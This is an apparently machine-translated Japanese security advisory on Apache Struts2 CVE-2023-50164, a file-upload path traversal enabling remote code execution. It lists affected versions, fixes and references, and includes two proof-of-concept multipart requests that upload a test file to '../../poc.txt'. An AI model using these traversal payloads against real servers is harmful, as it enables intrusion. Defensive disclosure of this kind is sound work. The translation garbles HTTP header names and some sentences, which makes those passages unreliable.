緊急通知: Apache Struts2 の高リスクの脆弱性により、リモートでコードが実行される脆弱性が明らかになりました - すぐにアップグレードしてください

Apache Struts のコード実行の脆弱性 (CVE-2023-50164) により、攻撃者はファイル アップロード パラメータの実行パス トラバーサルを制御でき、場合によっては悪意のあるファイルをアップロードして任意のコードを実行する可能性があります。

脆弱性の説明:

Apache Struts2Java EE Web アプリケーションを開発するためのオープンソース Web アプリケーション アーキテクチャです。 Java Servlet API を利用および拡張し、開発者が MVC アーキテクチャを採用することを奨励します。 Apache は、Struts 2 オープンソース Web アプリケーション フレームワークに重大なセキュリティ上の欠陥があるというセキュリティ警告を発行しました。リモートコード実行。脆弱性番号は、CVE-2023-50164欠陥に根ざした「」ファイルアップロードロジック」と許可されていない可能性があります。パストラバーサル、悪用されると悪意のあるファイルをアップロードし、任意のコードの実行を実現します。

脆弱性の影響:

2.5.0 <= ストラット <= 2.5.32

6.0.0 <= ストラット <= 6.3.0

 

脆弱性の証明:

POC 1:
——WebKitFormBoundary5WJ61X4PRwyYKlip
Content-Disposition: form-data; name="アップロード"; ファイル名="poc.txt"
コンテンツタイプ: テキスト/プレーン

テスト

——WebKitFormBoundary5WJ61X4PRwyYKlip
Content-Disposition: form-data; name="アップロードファイル名";

../../poc.txt

——WebKitFormBoundary5WJ61X4PRwyYKlip–

POC 2:

POST /s2_066_war_exploded/upload.action?uploadFileName=../../poc.txt HTTP/1.1
ホスト: ローカルホスト:8080
Accept-Language: en-US,en;q=0.9
ユーザーエージェント: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML、Gecko など) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip、deflate、br
コンテンツ タイプ: multipart/form-data; 境界=—-WebKitFormBoundary5WJ61X4PRwyYKlip
キャッシュ制御: max-age=0
受け入れる: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3; q=0.7
コンテンツの長さ: 593

——WebKitFormBoundary5WJ61X4PRwyYKlip
Content-Disposition: form-data; name="アップロード"; ファイル名="poc.txt"
コンテンツタイプ: テキスト/プレーン

テスト

——WebKitFormBoundary5WJ61X4PRwyYKlip–

バグの修正:

更新可能な公式バージョンが利用可能です。ユーザーはできるだけ早く安全なバージョンに更新することをお勧めします。

ストラット >= 2.5.33

Struts >= 6.3.0.2

パッチ: https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7

参照する:

https://cwiki.apache.org/confluence/display/WW/S2-066

https://github.com/apache/struts/compare/STRUTS_6_3_0…STRUTS_6_3_0_2#files_bucket

https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7

https://trganda.github.io/notes/security/vulnerabilities/apache-struts/Apache-Struts-Remote-Code-Execution-Vulnerability-(-S2-066-CVE-2023-50164)
https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-ストラット2-ファイルアップロード解析-S2-066/

原文、著者:最高セキュリティ責任者、転載する場合は出典を明記してください: https://cncso.com/jp/new-critical-rce-vulnerability-discovered-in-apache-struts2.html

のように (2)
前の 2023年12月12日午後8時05分
2023年12月14日午後10時04分

関連する提案